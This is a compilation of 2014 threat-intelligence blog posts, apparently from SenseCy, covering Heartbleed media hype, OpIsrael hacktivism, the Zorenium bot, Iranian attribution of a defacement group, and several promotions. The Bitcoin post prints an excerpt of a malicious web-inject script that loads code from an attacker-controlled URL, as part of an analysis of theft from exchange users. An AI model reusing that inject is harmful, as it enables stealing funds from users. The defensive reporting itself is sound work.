Why Scaring Is NOT an Effective Technique for Increasing Cyber Security?

There is a big hole in the Internet and it’s bleeding passwords. Or at least that is what one would understand from following various media reports about “Heartbleed”, that ominous flaw in the design of the Internet’s basic encryption method, the SSL. Just by reading (and listening to and watching) the media, one could be excused of thinking that the Internet as we know it has come to an end. Slogans like “Internet safety is gone” and “Replace all your passwords now!” were being shouted repeatedly (didn’t they tell us that passwords were useless anyway? and didn’t they say that 99.9% of the passwords are 123456 anyway?)

Regardless of the actual severity of this flaw, two things come to mind when analyzing the public and media’s behavior regarding Heartbleed. The first is that the media is thirsty for cyber-related stories, and is willing to blow any story out of proportion just to make the headlines – especially if it can be said to be “relevant to everyone” and “puts us all in danger.” But this is not surprising – there is a very unhealthy relationship between the media, the Cybersec industry and the public – each doing its share to evoke panic and misinformation.

What I find more disconcerting is that some people and organizations use such incidents to increase awareness of cyber threats and turn this into a call for action. While there is nothing wrong with raising awareness, I do believe that using it too much – i.e scaring people – achieves the opposite effect. Want an easy way of verifying this? Just ask the people around you (normal folk, not industry techies) if they have heard of Heartbleed. Many of them (especially in the U.S.) will probably say yes. Then ask how many of them have changed their passwords as a result of this being made public. I can almost guarantee that the answer will be zero. The explanation for this is simple – when people are presented with a catastrophe, they tend to do absolutely nothing. If nothing is safe anymore, than why bother doing something?

And that is exactly the problem. By creating panic, we also create apathy, when we should evoke emotion and move people to act – seek professional advice, check their systems for breaches, whatever. We should be stating very clearly the REAL threats and the REAL remedies, even if they make less appealing headlines. Only then do we stand the slightest chance that the “Average Joe” will stop, listen and act differently than before. “Make them aware, not scared” should be our motto.

heatbleed stop

April 7, 2014 OpIsrael Campaign Summary Presentation

April 7 2014 OpIsrael Campaign Summary Presentation

The #OpIsrael Birthday campaign took place as scheduled on April 7 and involved thousands of participants from all over the Muslim world, from Indonesia in the East to Morocco in the West. The following presentation by Gilad Zahavi, SenseCy Intelligence Director, summarizes the campaign and offers insights into the participants characteristics and tactics, and predictions for future campaigns.

SenseCy at the Defensive Cyberspace Operations & Intelligence (DCOI) Conference, Tel Aviv, April 8-9, 2014

We are proud to announce that SenseCy will be attending the DCOI Conference (Defensive Cyberspace Operations & Intelligence)!

Image

SenseCy CTO, Mr. Assaf Keren will be a panelist in a session discussing Cyber Intelligence, and we will host a two hour Seminar.

SenseCy Seminar will review the world of Cyber Intelligence and try to map which types of of data is available for companies and organizations that seek to defend themselves. We will do so utilizing real world intelligence collected and analyzed by SenseCy’s Cyber Intelligence analysts.  The seminar will be held on the second day of the conference (April, 9) at 14:00, at no extra cost. seats are limited so hurry and register!

For our friends and followers only – get a 20% discount off standard rate by using this coupon code: “944420” when registering.

Zorenium Bot: Follow-up

This is a guest post by Dimitry, a forensics expert who will be joining our team soon.

Image

As a follow up to our previous post, here is a quick overview of some of Zorenium’s capabilities.

Please note that as we are still in the process of fully analyzing this bot’s capabilities – the post is mostly based on the information publish by the bot maker.

Without a doubt, one of the most interesting modules to start with would be the FakeShoutDown mechanism. If according to the author indeed it operates as they say it does, then it is definitely a new “way of thinking”.

In essence, the authors of Zorenium are faking the shutdown process of a machine. The code imitates the entire process (once the shutdown sequence isinitiated by the user) including proper images and even, and this is quite fascinating, slowing down the computer fans to eliminate the noise.

In my humble opinion, it is quite impressive.

The bot has multiple interfaces of management (such as IRC and I2P), and all come with a great set of 256 bit AES keys.

Another interesting aspect would be the implementation of the stenography module. The stenography module is not a “regular”, and it makes this bot into more sophisticated than others. I am curious to see how that implementation works.

Another funky aspect of the bot would be what the author called “CHRISTMAS USERKIT4 SPECIAL ADDON”. Amongst the various features, the bot will replicate a new disk drive and will drop the core dll’s onto it. Then it will encrypt the hard drive and thus protect it from various AV and anti-malware mechanisms. Pretty sweet if you ask me.

The cherry on this icecream would be the iOS module. This is definitely the first bot that I have seen that actually operates on “Cross-platforms”. It can infect Android, Windows and iOS systems – a true nightmare to all security specialists. The main question regarding iOS still remains – are only jailbroken phones at risk or is it much, much worse?

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin
Bitcoin

From publicized breaches of Bitcoin trading sites, to wild fluctuations of the its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and  the level of security the exchange site provides. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcon exchange sites, there is a new trend, utilizing the ability of Trojans to hijack http sessions or plain old XSS and CSRF attacks, the attackers are injecting site-specific code to users and then scan for available funds in the user accounts and steal money from the accounts.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way,  and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
var s = document.createElement(‘script’);
s.type = ‘text/javascript’;
s.async=false;
s.src = “{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=”+data+”&rnd=”+Math.random();
s.onerror = s.onload = s.onreadystatechange = function(){
if(!this.loaded && (!this.readyState || this.readyState == ‘loaded’ || this.readyState == ‘complete’)){
this.onerror = this.onload = this.onreadystatechange = null;
}
}
if(document.getElementsByTagName(‘head’).length){ document.getElementsByTagName(‘head’)[0].appendChild(s); }else{ document.appendChild(s); }
}

In the continuation of the code, the attackers change the CSS setting of the site, and replace the values of the send-to-address, send-value and the send button elements. All in all, this is a very simple and elegant code that utilizes the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.

Special Launch Offer – Register to our Cyber Intelligence Feeds By March 31 and Receive a 50% Discount!

We are celebrating the launch of our cyber-intelligence feeds service and we are offering a 50% discount on annual subscriptions.

The offer applies to all feed types (News, Hacktivism and Cyber Crime) and is valid until March 31, 2014.

To enjoy this offer, register to our website (https://www.sensecy.com/products/) and select the desired feed you wish to subscribe to. On checkout, enter this coupon code: SENSECYMARCH2014.

Image
SenseCy Cyber Intelligence Feeds

The offer applies to all subscriptions purchased by March 31 and is valid for 12 months.

March 10 Hacktivist Campaign – “Op” or “Flop”?

Several hacktivist groups planned to launch a cyber assault (“Op”) against Israel on March 10, as a prequel to a major assault scheduled for April 7.

Although the Op was led by the capable militant groups Red Hack (Turkey) and AnonGhost (Tunisia), it did not appear to manifest fully – the scope of the attacks and the extent of damage were marginal at best. Several private Israeli websites were hacked/ DDoSd ?and some email addresses belonging to Bank of Israel employees were leaked (no password or additional details). The Op incorporated several alleged attempts to hack Israeli government sites. One of these was recorded as part of a tutorial on March 9th  – a Tunisian hacker affiliated with AnonGhost uploaded  a tutorial to YouTube explaining to beginners how to hack websites with different tools, in order to participate in the #OpIsrael attacks on April 7, 2014. The video demonstrates an attempt to hack an Israeli government website with ByteDos, LOIC, Snake Bite and more. It should be mentioned that this video is one of many uploaded to YouTube during the preparations for #OpIsrael and during the preparations for #OpIsrael and other cyber campaigns.

https://www.youtube.com/watch?v=uAjmDDxR2Y8&list=UUZuiY5Awp7xdQTzZyqXFywQ

YouTube tutorial of attempted hack of Israeli site
YouTube tutorial of attempted hack of Israeli site

In conclusion, it seems that the March 10 “Op” cannot be labeled a success, not even in terms of a grand rehearsal for the upcoming April campaign.

SenseCy is Hiring! Come Join the Cyber Intelligence Team

We are looking for two analysts to join our Cyber Intelligence Team: Native English Speaker (JB-309), Chinese Speaker (JB-310): 

1. Collect Open-Source Intelligence (OSINT), mainly on cyber security

2. Analyze technical intelligence and produce reports in English

3. Good understanding of cyber security

4. Ability to analyze technical data and extract crucial details

5. Ability to work independently and lead complex projects

6. Experience in Web Intelligence (WEBINT) methodologies – advantage

7. Knowledge of foreign languages – advantage

8. Knowledge of cyber security – advantage

Please send your CV to info [at] sensecy.com (and indicate the job number)

Qods Freedom Hacker Group – Possible Iranian Involvement in Cyber Activity against Israel

In late July and early August 2013, a Gaza-based hacker group named “Qods Freedom” launched a cyber-operation against Israeli websites. The attack comprised distributed denial-of-service (DDoS) attacks, website defacements and attempted bank account breaches.

"Qods Freedom" Facebook page
“Qods Freedom” Facebook page

The DDoS-affected sites were Israel Railways, El Al (Israel’s national airline) and a leading daily newspaper. The attacks were all effective, topping at about 3.2 Gb/sec, rendering the sites inaccessible for many hours.

Screenshot posted by the group showing El Al site down due to their attack
Screenshot posted by the group showing El Al site down due to their attack

The group defaced over 600 sites, most of them related to two hosting service providers (likely to have been compromised). The defacement messages suggest that the motivation for the attack was to commemorate “Quds Day” – the last Friday of Ramadan.The group did not attempt to conceal its actions. Quite the contrary – it has an official Facebook page and Imageshack account where it posted images purportedly depicting the breach of Israeli bank accounts.

The political affiliation of the groups seems very clear – hardcore Palestinian, anti-Israeli. This was also evident from pictures they posted on the defaced sites that included images of the Dome of the Rock, the Palestinian flag, footage of protesters skirmishing with IDF soldiers and a portrait of Hezbollah leader Hassan Nasrallah and a quote from his famous “Spider Web” speech, which he delivered in southern Lebanon in 2000 (where he predicted that Israel would break apart like spider webs in the slightest wind).

The group's defacement signature quoting Nasrallah with a typo
The group’s defacement signature quoting Nasrallah with a typo

After the attack subsided, SenseCy cyber intelligence analysts decided to take a closer look at the actions of this so-called Palestinian group. Gilad Zahavi, Director of Cyber Intelligence, recounted: “Something just didn’t add up. We were seeing many indications that this group was not what it portrayed itself to be, so we decided to dig deeper.”Using virtual entities (some of which have been in operation for some time, and are used to collect information on the vibrant hacking scene in Gaza), they started sniffing around on Palestinian forums and social media groups, but no-one seemed to know much about this group. With little else to do, the team looked again at the “signature” the group left after defacing one website. And there it was – a very uncharacteristic typo in the transcript of Nasrallah’s famous speech, one that no native Arab speaker would make. This raised suspicions that this group might not be Arab at all. A closer look at the font used to type the message confirmed that it originated from a Farsi-language keyboard.

Focusing on the Iranian connection, the team uncovered several other indications of the true origins of the group. For starters, “Quds Day” is mostly celebrated by the Iranian government and Hezbollah, not by Palestinian Sunnis. Secondly, the only references to these attacks (anywhere in the Muslim world) have come from the Iranian media. Two additional Iranian groups, “Iranian Data Coders” and Persian Flag Guards” use the same defacement signature, indicating at least some affiliation to Iranian cyber groups. The last telltale sign was that Iranian hacker groups often choose to masquerade as Arab hackers, choosing Arabic instead of Farsi names. A notable example is the “Izz ad-Din al-Qassam Cyber Fighters”, perceived to be linked to the Palestinian Hamas organization, but in fact operated by the Iranian regime.

So there you have it – an Iranian group with high technical capabilities, masquerading as a Palestinian group and attacking Israeli sites. This scheme was uncovered not by fancy computer forensics, but by good old-fashioned intelligence work, built on linguistic and cultural expertise, combined with a deep understanding of the cyber domain and intimate knowledge of the Middle East hacking scene.